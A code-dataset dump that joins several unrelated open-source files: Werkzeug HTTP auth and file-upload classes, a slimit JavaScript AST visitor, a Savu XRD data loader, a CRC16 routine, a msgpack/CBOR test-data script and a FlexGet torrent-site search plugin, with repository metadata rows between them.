def __init__(self, auth_type=None, values=None, on_update=None):
dict.__init__(self, values or ())
if auth_type:
self['__auth_type__'] = auth_type
self.on_update = on_update
def set_basic(self, realm='authentication required'):
"""Clear the auth info and enable basic auth."""
dict.clear(self)
dict.update(self, {'__auth_type__': 'basic', 'realm': realm})
if self.on_update:
self.on_update(self)
def set_digest(self, realm, nonce, qop=('auth',), opaque=None,
algorithm=None, stale=False):
"""Clear the auth info and enable digest auth."""
d = {
'__auth_type__': 'digest',
'realm': realm,
'nonce': nonce,
'qop': dump_header(qop)
}
if stale:
d['stale'] = 'TRUE'
if opaque is not None:
d['opaque'] = opaque
if algorithm is not None:
d['algorithm'] = algorithm
dict.clear(self)
dict.update(self, d)
if self.on_update:
self.on_update(self)
def to_header(self):
"""Convert the stored values into a WWW-Authenticate header."""
d = dict(self)
auth_type = d.pop('__auth_type__', None) or 'basic'
return '%s %s' % (auth_type.title(), ', '.join([
'%s=%s' % (key, quote_header_value(value,
allow_token=key not in self._require_quoting))
for key, value in iteritems(d)
]))
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.to_header()
)
def auth_property(name, doc=None):
"""A static helper function for subclasses to add extra authentication
system properties onto a class::
class FooAuthenticate(WWWAuthenticate):
special_realm = auth_property('special_realm')
For more information have a look at the sourcecode to see how the
regular properties (:attr:`realm` etc.) are implemented.
"""
def _set_value(self, value):
if value is None:
self.pop(name, None)
else:
self[name] = str(value)
return property(lambda x: x.get(name), _set_value, doc=doc)
def _set_property(name, doc=None):
def fget(self):
def on_update(header_set):
if not header_set and name in self:
del self[name]
elif header_set:
self[name] = header_set.to_header()
return parse_set_header(self.get(name), on_update)
return property(fget, doc=doc)
type = auth_property('__auth_type__', doc='''
The type of the auth mechanism. HTTP currently specifies
`Basic` and `Digest`.''')
realm = auth_property('realm', doc='''
A string to be displayed to users so they know which username and
password to use. This string should contain at least the name of
the host performing the authentication and might additionally
indicate the collection of users who might have access.''')
domain = _set_property('domain', doc='''
A list of URIs that define the protection space. If a URI is an
absolute path, it is relative to the canonical root URL of the
server being accessed.''')
nonce = auth_property('nonce', doc='''
A server-specified data string which should be uniquely generated
each time a 401 response is made. It is recommended that this
string be base64 or hexadecimal data.''')
opaque = auth_property('opaque', doc='''
A string of data, specified by the server, which should be returned
by the client unchanged in the Authorization header of subsequent
requests with URIs in the same protection space. It is recommended
that this string be base64 or hexadecimal data.''')
algorithm = auth_property('algorithm', doc='''
A string indicating a pair of algorithms used to produce the digest
and a checksum. If this is not present it is assumed to be "MD5".
If the algorithm is not understood, the challenge should be ignored
(and a different one used, if there is more than one).''')
qop = _set_property('qop', doc='''
A set of quality-of-privacy directives such as auth and auth-int.''')
def _get_stale(self):
val = self.get('stale')
if val is not None:
return val.lower() == 'true'
def _set_stale(self, value):
if value is None:
self.pop('stale', None)
else:
self['stale'] = value and 'TRUE' or 'FALSE'
stale = property(_get_stale, _set_stale, doc='''
A flag, indicating that the previous request from the client was
rejected because the nonce value was stale.''')
del _get_stale, _set_stale
# make auth_property a staticmethod so that subclasses of
# `WWWAuthenticate` can use it for new properties.
auth_property = staticmethod(auth_property)
del _set_property
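# --- illustrative usage sketch (editor-added) ---
# Building a challenge header and extending the class through the
# auth_property hook documented above; the 'error' field of the subclass is
# only a hypothetical example.
def _www_authenticate_example():
    www_auth = WWWAuthenticate()
    www_auth.set_basic(realm='secret area')
    basic_header = www_auth.to_header()          # 'Basic realm="secret area"'
    class TokenAuthenticate(WWWAuthenticate):
        error = WWWAuthenticate.auth_property('error')   # hypothetical extra field
    challenge = TokenAuthenticate('bearer')
    challenge.error = 'invalid_token'
    return basic_header, challenge.to_header()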
class FileStorage(object):
"""The :class:`FileStorage` class is a thin wrapper over incoming files.
It is used by the request object to represent uploaded files. All the
attributes of the wrapper stream are proxied by the file storage so
it's possible to do ``storage.read()`` instead of the long form
``storage.stream.read()``.
"""
def __init__(self, stream=None, filename=None, name=None,
content_type=None, content_length=None,
headers=None):
self.name = name
self.stream = stream or _empty_stream
# if no filename is provided we can attempt to get the filename
# from the stream object passed. There we have to be careful to
# skip things like <fdopen>, <stderr> etc. Python marks these
# special filenames with angular brackets.
if filename is None:
filename = getattr(stream, 'name', None)
s = make_literal_wrapper(filename)
if filename and filename[0] == s('<') and filename[-1] == s('>'):
filename = None
# On Python 3 we want to make sure the filename is always unicode.
# This might not be if the name attribute is bytes due to the
# file being opened from the bytes API.
if not PY2 and isinstance(filename, bytes):
filename = filename.decode(sys.getfilesystemencoding(),
'replace')
self.filename = filename
if headers is None:
headers = Headers()
self.headers = headers
if content_type is not None:
headers['Content-Type'] = content_type
if content_length is not None:
headers['Content-Length'] = str(content_length)
def _parse_content_type(self):
if not hasattr(self, '_parsed_content_type'):
self._parsed_content_type = \
parse_options_header(self.content_type)
@property
def content_type(self):
"""The content-type sent in the header. Usually not available"""
return self.headers.get('content-type')
@property
def content_length(self):
"""The content-length sent in the header. Usually not available"""
return int(self.headers.get('content-length') or 0)
@property
def mimetype(self):
"""Like :attr:`content_type` but without parameters (eg, without
charset, type etc.). For example if the content
type is ``text/html; charset=utf-8`` the mimetype would be
``'text/html'``.
.. versionadded:: 0.7
"""
self._parse_content_type()
return self._parsed_content_type[0]
@property
def mimetype_params(self):
"""The mimetype parameters as dict. For example if the content
type is ``text/html; charset=utf-8`` the params would be
``{'charset': 'utf-8'}``.
.. versionadded:: 0.7
"""
self._parse_content_type()
return self._parsed_content_type[1]
def save(self, dst, buffer_size=16384):
"""Save the file to a destination path or file object. If the
destination is a file object you have to close it yourself after the
call. The buffer size is the number of bytes held in memory during
the copy process. It defaults to 16KB.
For secure file saving also have a look at :func:`secure_filename`.
:param dst: a filename or open file object the uploaded file
is saved to.
:param buffer_size: the size of the buffer. This works the same as
the `length` parameter of
:func:`shutil.copyfileobj`.
"""
from shutil import copyfileobj
close_dst = False
if isinstance(dst, string_types):
dst = open(dst, 'wb')
close_dst = True
try:
copyfileobj(self.stream, dst, buffer_size)
finally:
if close_dst:
dst.close()
def close(self):
"""Close the underlying file if possible."""
try:
self.stream.close()
except Exception:
pass
def __nonzero__(self):
return bool(self.filename)
def __getattr__(self, name):
return getattr(self.stream, name)
def __iter__(self):
return iter(self.readline, '')
def __repr__(self):
return '<%s: %r (%r)>' % (
self.__class__.__name__,
self.filename,
self.content_type
)
# circular dependencies
from werkzeug.http import dump_options_header, dump_header, generate_etag, \
quote_header_value, parse_set_header, unquote_etag, quote_etag, \
parse_options_header, http_date, is_byte_range_valid
from werkzeug import exceptions
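# --- illustrative usage sketch (editor-added) ---
# FileStorage wraps an incoming upload; saving into an in-memory buffer
# keeps the sketch free of filesystem side effects.
def _filestorage_example():
    from io import BytesIO
    upload = FileStorage(stream=BytesIO(b'hello'), filename='hello.txt',
                         content_type='text/plain')
    target = BytesIO()
    upload.save(target)
    return upload.mimetype, target.getvalue()    # ('text/plain', b'hello')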
| apache-2.0 | 2,562,384,758,529,963,500 | 31.940481 | 86 | 0.569142 | false |
moses-palmer/slimit | src/slimit/visitors/ecmavisitor.py | 1 | 12856 | ###############################################################################
#
# Copyright (c) 2011 Ruslan Spivak
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
__author__ = 'Ruslan Spivak <[email protected]>'
from slimit import ast
class ECMAVisitor(object):
def __init__(self):
self.indent_level = 0
def _make_indent(self):
return ' ' * self.indent_level
def visit(self, node):
method = 'visit_%s' % node.__class__.__name__
return getattr(self, method, self.generic_visit)(node)
def generic_visit(self, node):
return 'GEN: %r' % node
def visit_Program(self, node):
return '\n'.join(self.visit(child) for child in node)
def visit_Block(self, node):
s = '{\n'
self.indent_level += 2
s += '\n'.join(
self._make_indent() + self.visit(child) for child in node)
self.indent_level -= 2
s += '\n' + self._make_indent() + '}'
return s
def visit_VarStatement(self, node):
s = 'var %s;' % ', '.join(self.visit(child) for child in node)
return s
def visit_VarDecl(self, node):
output = []
output.append(self.visit(node.identifier))
if node.initializer is not None:
output.append(' = %s' % self.visit(node.initializer))
return ''.join(output)
def visit_Identifier(self, node):
return node.value
def visit_Assign(self, node):
if node.op == ':':
template = '%s%s %s'
else:
template = '%s %s %s'
if getattr(node, '_parens', False):
template = '(%s)' % template
return template % (
self.visit(node.left), node.op, self.visit(node.right))
def visit_GetPropAssign(self, node):
template = 'get %s() {\n%s\n%s}'
if getattr(node, '_parens', False):
template = '(%s)' % template
self.indent_level += 2
body = '\n'.join(
(self._make_indent() + self.visit(el))
for el in node.elements
)
self.indent_level -= 2
tail = self._make_indent()
return template % (self.visit(node.prop_name), body, tail)
def visit_SetPropAssign(self, node):
template = 'set %s(%s) {\n%s\n%s}'
if getattr(node, '_parens', False):
template = '(%s)' % template
if len(node.parameters) > 1:
raise SyntaxError(
'Setter functions must have one argument: %s' % node)
params = ','.join(self.visit(param) for param in node.parameters)
self.indent_level += 2
body = '\n'.join(
(self._make_indent() + self.visit(el))
for el in node.elements
)
self.indent_level -= 2
tail = self._make_indent()
return template % (self.visit(node.prop_name), params, body, tail)
def visit_Number(self, node):
return node.value
def visit_Comma(self, node):
s = '%s, %s' % (self.visit(node.left), self.visit(node.right))
if getattr(node, '_parens', False):
s = '(' + s + ')'
return s
def visit_EmptyStatement(self, node):
return node.value
def visit_If(self, node):
s = 'if ('
if node.predicate is not None:
s += self.visit(node.predicate)
s += ') '
s += self.visit(node.consequent)
if node.alternative is not None:
s += ' else '
s += self.visit(node.alternative)
return s
def visit_Boolean(self, node):
return node.value
def visit_For(self, node):
s = 'for ('
if node.init is not None:
s += self.visit(node.init)
if node.init is None:
s += ' ; '
elif isinstance(node.init, (ast.Assign, ast.Comma, ast.FunctionCall,
ast.UnaryOp, ast.Identifier, ast.BinOp,
ast.Conditional, ast.Regex, ast.NewExpr)):
s += '; '
else:
s += ' '
if node.cond is not None:
s += self.visit(node.cond)
s += '; '
if node.count is not None:
s += self.visit(node.count)
s += ') ' + self.visit(node.statement)
return s
def visit_ForIn(self, node):
if isinstance(node.item, ast.VarDecl):
template = 'for (var %s in %s) '
else:
template = 'for (%s in %s) '
s = template % (self.visit(node.item), self.visit(node.iterable))
s += self.visit(node.statement)
return s
def visit_BinOp(self, node):
if getattr(node, '_parens', False):
template = '(%s %s %s)'
else:
template = '%s %s %s'
return template % (
self.visit(node.left), node.op, self.visit(node.right))
def visit_UnaryOp(self, node):
s = self.visit(node.value)
if node.postfix:
s += node.op
elif node.op in ('delete', 'void', 'typeof'):
s = '%s %s' % (node.op, s)
else:
s = '%s%s' % (node.op, s)
if getattr(node, '_parens', False):
s = '(%s)' % s
return s
def visit_ExprStatement(self, node):
return '%s;' % self.visit(node.expr)
def visit_DoWhile(self, node):
s = 'do '
s += self.visit(node.statement)
s += ' while (%s);' % self.visit(node.predicate)
return s
def visit_While(self, node):
s = 'while (%s) ' % self.visit(node.predicate)
s += self.visit(node.statement)
return s
def visit_Null(self, node):
return 'null'
def visit_String(self, node):
return node.value
def visit_Continue(self, node):
if node.identifier is not None:
s = 'continue %s;' % self.visit_Identifier(node.identifier)
else:
s = 'continue;'
return s
def visit_Break(self, node):
if node.identifier is not None:
s = 'break %s;' % self.visit_Identifier(node.identifier)
else:
s = 'break;'
return s
def visit_Return(self, node):
if node.expr is None:
return 'return;'
else:
return 'return %s;' % self.visit(node.expr)
def visit_With(self, node):
s = 'with (%s) ' % self.visit(node.expr)
s += self.visit(node.statement)
return s
def visit_Label(self, node):
s = '%s: %s' % (
self.visit(node.identifier), self.visit(node.statement))
return s
def visit_Switch(self, node):
s = 'switch (%s) {\n' % self.visit(node.expr)
self.indent_level += 2
for case in node.cases:
s += self._make_indent() + self.visit_Case(case)
if node.default is not None:
s += self.visit_Default(node.default)
self.indent_level -= 2
s += self._make_indent() + '}'
return s
def visit_Case(self, node):
s = 'case %s:\n' % self.visit(node.expr)
self.indent_level += 2
elements = '\n'.join(self._make_indent() + self.visit(element)
for element in node.elements)
if elements:
s += elements + '\n'
self.indent_level -= 2
return s
def visit_Default(self, node):
s = self._make_indent() + 'default:\n'
self.indent_level += 2
s += '\n'.join(self._make_indent() + self.visit(element)
for element in node.elements)
if node.elements is not None:
s += '\n'
self.indent_level -= 2
return s
def visit_Throw(self, node):
s = 'throw %s;' % self.visit(node.expr)
return s
def visit_Debugger(self, node):
return '%s;' % node.value
def visit_Try(self, node):
s = 'try '
s += self.visit(node.statements)
if node.catch is not None:
s += ' ' + self.visit(node.catch)
if node.fin is not None:
s += ' ' + self.visit(node.fin)
return s
def visit_Catch(self, node):
s = 'catch (%s) %s' % (
self.visit(node.identifier), self.visit(node.elements))
return s
def visit_Finally(self, node):
s = 'finally %s' % self.visit(node.elements)
return s
def visit_FuncDecl(self, node):
self.indent_level += 2
elements = '\n'.join(self._make_indent() + self.visit(element)
for element in node.elements)
self.indent_level -= 2
s = 'function %s(%s) {\n%s' % (
self.visit(node.identifier),
', '.join(self.visit(param) for param in node.parameters),
elements,
)
s += '\n' + self._make_indent() + '}'
return s
def visit_FuncExpr(self, node):
self.indent_level += 2
elements = '\n'.join(self._make_indent() + self.visit(element)
for element in node.elements)
self.indent_level -= 2
ident = node.identifier
ident = '' if ident is None else ' %s' % self.visit(ident)
header = 'function%s(%s)'
if getattr(node, '_parens', False):
header = '(' + header
s = (header + ' {\n%s') % (
ident,
', '.join(self.visit(param) for param in node.parameters),
elements,
)
s += '\n' + self._make_indent() + '}'
if getattr(node, '_parens', False):
s += ')'
return s
def visit_Conditional(self, node):
if getattr(node, '_parens', False):
template = '(%s ? %s : %s)'
else:
template = '%s ? %s : %s'
s = template % (
self.visit(node.predicate),
self.visit(node.consequent), self.visit(node.alternative))
return s
def visit_Regex(self, node):
if getattr(node, '_parens', False):
return '(%s)' % node.value
else:
return node.value
def visit_NewExpr(self, node):
s = 'new %s(%s)' % (
self.visit(node.identifier),
', '.join(self.visit(arg) for arg in node.args)
)
return s
def visit_DotAccessor(self, node):
if getattr(node, '_parens', False):
template = '(%s.%s)'
else:
template = '%s.%s'
left = self.visit(node.node)
if isinstance(node.node, ast.Number):
left = '(%s)' % left
s = template % (left, self.visit(node.identifier))
return s
def visit_BracketAccessor(self, node):
s = '%s[%s]' % (self.visit(node.node), self.visit(node.expr))
return s
def visit_FunctionCall(self, node):
s = '%s(%s)' % (self.visit(node.identifier),
', '.join(self.visit(arg) for arg in node.args))
if getattr(node, '_parens', False):
s = '(' + s + ')'
return s
def visit_Object(self, node):
s = '{\n'
self.indent_level += 2
s += ',\n'.join(self._make_indent() + self.visit(prop)
for prop in node.properties)
self.indent_level -= 2
if node.properties:
s += '\n'
s += self._make_indent() + '}'
return s
def visit_Array(self, node):
s = '['
length = len(node.items) - 1
for index, item in enumerate(node.items):
if isinstance(item, ast.Elision):
s += ','
elif index != length:
s += self.visit(item) + ','
else:
s += self.visit(item)
s += ']'
return s
def visit_This(self, node):
return 'this'
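# --- illustrative usage sketch (editor-added, not part of the original module) ---
# Typical round trip, assuming the package's own parser is importable:
# parse JavaScript into slimit's AST and let the visitor regenerate source.
def _ecma_visitor_example():
    from slimit.parser import Parser
    tree = Parser().parse('var answer = 40 + 2;')
    return ECMAVisitor().visit(tree)      # 'var answer = 40 + 2;'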
| mit | 702,696,883,069,655,800 | 31.14 | 79 | 0.518979 | false |
FedeMPouzols/Savu | savu/plugins/loaders/multi_modal_loaders/i18_loaders/i18xrd_loader.py | 1 | 5937 | # Copyright 2014 Diamond Light Source Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module:: I18xrd_loader
   :platform: Unix
   :synopsis: A class for loading I18's xrd data
.. moduleauthor:: Aaron Parsons <[email protected]>
"""
from savu.plugins.loaders.multi_modal_loaders.base_i18_multi_modal_loader \
import BaseI18MultiModalLoader
from savu.data.data_structures.data_type import FabIO
from savu.plugins.utils import register_plugin
import h5py
import tempfile
import logging
import math
import os
import savu.test.test_utils as tu
@register_plugin
class I18xrdLoader(BaseI18MultiModalLoader):
"""
    A class to load I18's XRD image data from a folder of detector images.
:param data_path: Path to the folder containing the \
data. Default: 'Savu/test_data/data/image_test/tiffs'.
:param calibration_path: path to the calibration \
file. Default: "Savu/test_data/data/LaB6_calibration_output.nxs".
"""
def __init__(self, name='I18xrdLoader'):
super(I18xrdLoader, self).__init__(name)
def setup(self):
"""
        Set up the xrd data object from the image files, configure its motors
        and patterns, and read the calibration metadata from the file given in
        the plugin parameters.
"""
data_obj = self.multi_modal_setup('xrd')
scan_pattern = self.parameters['scan_pattern']
frame_dim = range(len(scan_pattern))
shape = []
for pattern in self.parameters['scan_pattern']:
if pattern == 'rotation':
pattern = 'rotation_angle'
shape.append(len(data_obj.meta_data.get_meta_data(pattern)))
path = self.get_path('data_path')#self.parameters['data_path']
data_obj.data = FabIO(path, data_obj, frame_dim, shape=tuple(shape))
# dummy file
filename = path.split('/')[-1] + '.h5'
data_obj.backing_file = \
h5py.File(tempfile.mkdtemp() + '/' + filename, 'a')
data_obj.set_shape(data_obj.data.get_shape())
self.set_motors(data_obj, 'xrd')
self.add_patterns_based_on_acquisition(data_obj, 'xrd')
self.set_data_reduction_params(data_obj)
calibrationfile = h5py.File(self.get_path('calibration_path'), 'r')
        # let's just make this all in metres and convert for pyFAI in the base integrator
try:
logging.debug('testing the version of the calibration file')
det_str = 'entry1/instrument/detector'
mData = data_obj.meta_data
xpix = calibrationfile[det_str + '/detector_module/fast_pixel_direction'].value*1e-3 # in metres
mData.set_meta_data("x_pixel_size",xpix)
mData.set_meta_data("beam_center_x",
calibrationfile[det_str + '/beam_center_x'].value*1e-3) #in metres
mData.set_meta_data("beam_center_y",
calibrationfile[det_str + '/beam_center_y'].value*1e-3) # in metres
mData.set_meta_data("distance",
calibrationfile[det_str + '/distance'].value*1e-3) # in metres
mData.set_meta_data("incident_wavelength",
calibrationfile['/entry1/calibration_sample/beam'
'/incident_wavelength'].value*1e-10) # in metres
mData.set_meta_data("yaw", -calibrationfile[det_str + '/transformations/euler_b'].value)# in degrees
mData.set_meta_data("roll",calibrationfile[det_str + '/transformations/euler_c'].value-180.0)# in degrees
logging.debug('.... its the version in DAWN 2.0')
except KeyError:
try:
det_str = 'entry/instrument/detector'
mData = data_obj.meta_data
xpix = calibrationfile[det_str + '/x_pixel_size'].value * 1e-3
mData.set_meta_data("x_pixel_size", xpix) # in metres
mData.set_meta_data("beam_center_x",
calibrationfile[det_str + '/beam_center_x'].value*xpix)# in metres
mData.set_meta_data("beam_center_y",
calibrationfile[det_str + '/beam_center_y'].value*xpix) # in metres
mData.set_meta_data("distance",
calibrationfile[det_str + '/distance'].value*1e-3) # in metres
mData.set_meta_data("incident_wavelength",
calibrationfile['/entry/calibration_sample/beam'
'/incident_wavelength'].value*1e-10)# in metres
orien = calibrationfile[det_str + '/detector_orientation'][...].reshape((3, 3))
yaw = math.degrees(-math.atan2(orien[2, 0], orien[2, 2]))# in degrees
roll = math.degrees(-math.atan2(orien[0, 1], orien[1, 1]))# in degrees
mData.set_meta_data("yaw", -yaw)
mData.set_meta_data("roll", roll)
logging.debug('.... its the legacy version pre-DAWN 2.0')
except KeyError:
logging.warn("We don't know what type of calibration file this is")
self.set_data_reduction_params(data_obj)
calibrationfile.close()
def get_path(self,field):
path = self.parameters[field]
if path.split(os.sep)[0] == 'Savu':
path = tu.get_test_data_path(path.split('/test_data/data')[1])
return path
| gpl-3.0 | -7,426,081,832,613,310,000 | 42.654412 | 117 | 0.59744 | false |
zitouni/ieee_802-15-4_868-900 | examples/usrpN210/tools/crc16.py | 7 | 1996 | #!/usr/bin/env python
"""
Translation from a C code posted to a forum on the Internet.
@translator Thomas Schmid
"""
from array import array
def reflect(crc, bitnum):
# reflects the lower 'bitnum' bits of 'crc'
j=1
crcout=0
for b in range(bitnum):
i=1<<(bitnum-1-b)
if crc & i:
crcout |= j
j <<= 1
return crcout
def crcbitbybit(p):
# bit by bit algorithm with augmented zero bytes.
crc = 0
for i in range(len(p)):
c = p[i]
c = reflect(ord(c), 8)
j=0x80
for b in range(16):
bit = crc & 0x8000
crc <<= 1
crc &=0xFFFF
if c & j:
crc |= 1
if bit:
crc ^= 0x1021
j>>=1
if j == 0:
break
for i in range(16):
bit = crc & 0x8000
crc <<= 1
if bit:
crc ^= 0x1021
crc = reflect(crc, 16)
return crc
class CRC16(object):
""" Class interface, like the Python library's cryptographic
hash functions (which CRC's are definitely not.)
"""
def __init__(self, string=''):
self.val = 0
if string:
self.update(string)
def update(self, string):
self.val = crcbitbybit(string)
def checksum(self):
return chr(self.val >> 8) + chr(self.val & 0xff)
def intchecksum(self):
return self.val
def hexchecksum(self):
return '%04x' % self.val
def copy(self):
clone = CRC16()
clone.val = self.val
return clone
crc = CRC16()
#crc.update("123456789")
import struct
crc.update(struct.pack("20B", 0x1, 0x88, 0xe5, 0xff, 0xff, 0xff, 0xff, 0x10, 0x0, 0x10, 0x0, 0x1, 0x80, 0x80, 0xff, 0xff, 0x10, 0x0, 0x20, 0x0))
assert crc.checksum() == '\x02\x82'
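# --- illustrative usage sketch (editor-added) ---
# The commented-out line above hints at the conventional CRC check string;
# with this reflected 0x1021 polynomial and zero initial value the result
# should be the CRC-16/KERMIT check value 0x2189 (stated as an expectation,
# not something asserted by the original module).
def _crc16_example():
    c = CRC16("123456789")
    return c.hexchecksum()     # expected: '2189'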
| gpl-3.0 | 551,362,120,101,230,300 | 20.934066 | 144 | 0.480461 | false |
kelemetry/beacon | vendor/github.com/ugorji/go/codec/test.py | 107 | 4029 | #!/usr/bin/env python
# This will create golden files in a directory passed to it.
# A Test calls this internally to create the golden files
# So it can process them (so we don't have to checkin the files).
# Ensure msgpack-python and cbor are installed first, using:
# sudo apt-get install python-dev
# sudo apt-get install python-pip
# pip install --user msgpack-python msgpack-rpc-python cbor
# Ensure all "string" keys are utf strings (else encoded as bytes)
import cbor, msgpack, msgpackrpc, sys, os, threading
def get_test_data_list():
# get list with all primitive types, and a combo type
l0 = [
-8,
-1616,
-32323232,
-6464646464646464,
192,
1616,
32323232,
6464646464646464,
192,
-3232.0,
-6464646464.0,
3232.0,
6464.0,
6464646464.0,
False,
True,
u"null",
None,
u"some&day>some<day",
1328176922000002000,
u"",
-2206187877999998000,
u"bytestring",
270,
u"none",
-2013855847999995777,
#-6795364578871345152,
]
l1 = [
{ "true": True,
"false": False },
{ "true": u"True",
"false": False,
"uint16(1616)": 1616 },
{ "list": [1616, 32323232, True, -3232.0, {"TRUE":True, "FALSE":False}, [True, False] ],
"int32":32323232, "bool": True,
"LONG STRING": u"123456789012345678901234567890123456789012345678901234567890",
"SHORT STRING": u"1234567890" },
{ True: "true", 138: False, "false": 200 }
]
l = []
l.extend(l0)
l.append(l0)
l.append(1)
l.extend(l1)
return l
def build_test_data(destdir):
l = get_test_data_list()
for i in range(len(l)):
# packer = msgpack.Packer()
serialized = msgpack.dumps(l[i])
f = open(os.path.join(destdir, str(i) + '.msgpack.golden'), 'wb')
f.write(serialized)
f.close()
serialized = cbor.dumps(l[i])
f = open(os.path.join(destdir, str(i) + '.cbor.golden'), 'wb')
f.write(serialized)
f.close()
def doRpcServer(port, stopTimeSec):
class EchoHandler(object):
def Echo123(self, msg1, msg2, msg3):
return ("1:%s 2:%s 3:%s" % (msg1, msg2, msg3))
def EchoStruct(self, msg):
return ("%s" % msg)
addr = msgpackrpc.Address('localhost', port)
server = msgpackrpc.Server(EchoHandler())
server.listen(addr)
# run thread to stop it after stopTimeSec seconds if > 0
if stopTimeSec > 0:
def myStopRpcServer():
server.stop()
t = threading.Timer(stopTimeSec, myStopRpcServer)
t.start()
server.start()
def doRpcClientToPythonSvc(port):
address = msgpackrpc.Address('localhost', port)
client = msgpackrpc.Client(address, unpack_encoding='utf-8')
print client.call("Echo123", "A1", "B2", "C3")
print client.call("EchoStruct", {"A" :"Aa", "B":"Bb", "C":"Cc"})
def doRpcClientToGoSvc(port):
# print ">>>> port: ", port, " <<<<<"
address = msgpackrpc.Address('localhost', port)
client = msgpackrpc.Client(address, unpack_encoding='utf-8')
print client.call("TestRpcInt.Echo123", ["A1", "B2", "C3"])
print client.call("TestRpcInt.EchoStruct", {"A" :"Aa", "B":"Bb", "C":"Cc"})
def doMain(args):
if len(args) == 2 and args[0] == "testdata":
build_test_data(args[1])
elif len(args) == 3 and args[0] == "rpc-server":
doRpcServer(int(args[1]), int(args[2]))
elif len(args) == 2 and args[0] == "rpc-client-python-service":
doRpcClientToPythonSvc(int(args[1]))
elif len(args) == 2 and args[0] == "rpc-client-go-service":
doRpcClientToGoSvc(int(args[1]))
else:
print("Usage: test.py " +
"[testdata|rpc-server|rpc-client-python-service|rpc-client-go-service] ...")
if __name__ == "__main__":
doMain(sys.argv[1:])
| apache-2.0 | -6,868,696,857,130,023,000 | 30.97619 | 96 | 0.569868 | false |
BrainDamage/Flexget | flexget/plugins/search_ptn.py | 4 | 4667 | from __future__ import unicode_literals, division, absolute_import
import logging
from requests.auth import AuthBase
from flexget import plugin
from flexget.entry import Entry
from flexget.event import event
from flexget.utils import requests
from flexget.utils.imdb import extract_id
from flexget.utils.soup import get_soup
from flexget.utils.search import torrent_availability
log = logging.getLogger('search_ptn')
class CookieAuth(AuthBase):
def __init__(self, cookies):
self.cookies = cookies
def __call__(self, r):
r.prepare_cookies(self.cookies)
return r
categories = {
'1080p': 'c5',
'720p': 'c6',
'bdrip': 'c10',
'bluray': 'c1',
'brrip': 'c11',
'dvdr': 'c4',
'dvdrip': 'c12',
'mp4': 'c16',
'ost/flac': 'c17',
'ost/mp3': 'c18',
'packs': 'c20',
'r5/scr': 'c13',
'remux': 'c2',
'tvrip': 'c15',
'webrip': 'c14'
}
class SearchPTN(object):
schema = {
'type': 'object',
'properties': {
'username': {'type': 'string'},
'login_key': {'type': 'string'},
'password': {'type': 'string'},
'categories': {
'type': 'array',
'items': {'type': 'string', 'enum': list(categories)}
}
},
'required': ['username', 'login_key', 'password'],
'additionalProperties': False
}
def search(self, entry, config):
login_sess = requests.Session()
login_params = {'username': config['username'],
'password': config['password'],
'loginkey': config['login_key']}
try:
login_sess.post('https://piratethenet.org/takelogin.php', data=login_params, verify=False)
except requests.RequestException as e:
log.error('Error while logging in to PtN: %s', e)
download_auth = CookieAuth(login_sess.cookies)
# Default to searching by title (0=title 3=imdb_id)
search_by = 0
if 'imdb_id' in entry:
searches = [entry['imdb_id']]
search_by = 3
elif 'movie_name' in entry:
search = entry['movie_name']
if 'movie_year' in entry:
search += ' %s' % entry['movie_year']
searches = [search]
else:
searches = entry.get('search_strings', [entry['title']])
params = {'_by': search_by}
if config.get('categories'):
for cat in config['categories']:
params[categories[cat]] = 1
results = set()
for search in searches:
params['search'] = search
try:
r = login_sess.get('http://piratethenet.org/browse.php', params=params)
except requests.RequestException as e:
log.error('Error searching ptn: %s' % e)
continue
soup = get_soup(r.text)
if 'login' in soup.head.title.text.lower():
log.error('PtN cookie info invalid')
raise plugin.PluginError('PTN cookie info invalid')
try:
results_table = soup.find_all('table', attrs={'class': 'main'}, limit=2)[1]
except IndexError:
log.debug('no results found for `%s`' % search)
continue
for row in results_table.find_all('tr')[1:]:
columns = row.find_all('td')
entry = Entry()
links = columns[1].find_all('a', recursive=False, limit=2)
entry['title'] = links[0].text
if len(links) > 1:
entry['imdb_id'] = extract_id(links[1].get('href'))
entry['url'] = 'http://piratethenet.org/' + columns[2].a.get('href')
entry['download_auth'] = download_auth
entry['torrent_seeds'] = int(columns[8].text)
entry['torrent_leeches'] = int(columns[9].text)
entry['search_sort'] = torrent_availability(entry['torrent_seeds'], entry['torrent_leeches'])
size = columns[6].find('br').previous_sibling
unit = columns[6].find('br').next_sibling
if unit == 'GB':
entry['content_size'] = int(float(size) * 1024)
elif unit == 'MB':
entry['content_size'] = int(float(size))
elif unit == 'KB':
entry['content_size'] = int(float(size) / 1024)
results.add(entry)
return results
@event('plugin.register')
def register_plugin():
plugin.register(SearchPTN, 'ptn', groups=['search'], api_ver=2)
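# --- illustrative configuration sketch (editor-added) ---
# Search plugins like this one are normally driven from the 'discover'
# plugin; the values below are placeholders matching the schema above.
#
#   tasks:
#     ptn-movies:
#       discover:
#         what:
#           - movie_list: watchlist
#         from:
#           - ptn:
#               username: my_user
#               login_key: my_login_key
#               password: my_password
#               categories: [720p, 1080p]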
| mit | 6,010,418,141,242,508,000 | 34.356061 | 109 | 0.526248 | false |
map222/spark | examples/src/main/python/ml/n_gram_example.py | 123 | 1545 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
